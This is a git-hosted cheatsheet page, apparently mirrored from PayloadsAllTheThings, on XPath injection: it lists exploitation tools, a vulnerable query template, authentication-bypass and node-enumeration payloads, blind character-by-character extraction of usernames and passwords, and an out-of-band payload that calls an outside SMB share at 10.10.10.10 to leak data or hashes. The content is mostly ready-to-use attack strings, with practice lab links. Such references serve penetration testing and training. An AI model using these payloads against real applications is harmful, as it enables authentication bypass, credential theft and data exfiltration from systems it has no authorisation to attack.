daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (2950B)


      1 ---
      2 title: "XPATH Injection"
      3 topic: "XPATH Injection"
      4 topicSlug: "xpath-injection"
      5 sourcePath: "XPATH Injection/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XPATH%20Injection/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # XPATH Injection
     12 
     13 > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19     * [Blind Exploitation](#blind-exploitation)
     20     * [Out Of Band Exploitation](#out-of-band-exploitation)
     21 * [Labs](#labs)
     22 * [References](#references)
     23 
     24 ## Tools
     25 
     26 * [orf/xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
     27 * [feakk/xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
     28 * [aayla-secura/xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
     29 * [micsoftvn/xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
     30 * [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
     31 
     32 ## Methodology
     33 
     34 Similar to SQL injection, you want to terminate the query properly:
     35 
     36 ```ps1
     37 string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())
     38 ```
     39 
     40 ```sql
     41 ' or '1'='1
     42 ' or ''='
     43 x' or 1=1 or 'x'='y
     44 /
     45 //
     46 //*
     47 */*
     48 @*
     49 count(/child::node())
     50 x' or name()='username' or 'x'='y
     51 ' and count(/*)=1 and '1'='1
     52 ' and count(/@*)=1 and '1'='1
     53 ' and count(/comment())=1 and '1'='1
     54 ')] | //user/*[contains(*,'
     55 ') and contains(../password,'c
     56 ') and starts-with(../password,'c
     57 ```
     58 
     59 ### Blind Exploitation
     60 
     61 1. Size of a string
     62 
     63     ```sql
     64     and string-length(account)=SIZE_INT
     65     ```
     66 
     67 2. Access a character with `substring`, and verify its value the `codepoints-to-string` function
     68 
     69     ```sql
     70     substring(//user[userid=5]/username,2,1)=CHAR_HERE
     71     substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
     72     ```
     73 
     74 ### Out Of Band Exploitation
     75 
     76 ```powershell
     77 http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
     78 ```
     79 
     80 ## Labs
     81 
     82 * [Root Me - XPath injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Authentication)
     83 * [Root Me - XPath injection - String](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-String)
     84 * [Root Me - XPath injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Blind)
     85 
     86 ## References
     87 
     88 * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://web.archive.org/web/20170325082934/http://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
     89 * [XPATH Injection - OWASP - January 21, 2015](https://web.archive.org/web/20240217030110/http://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))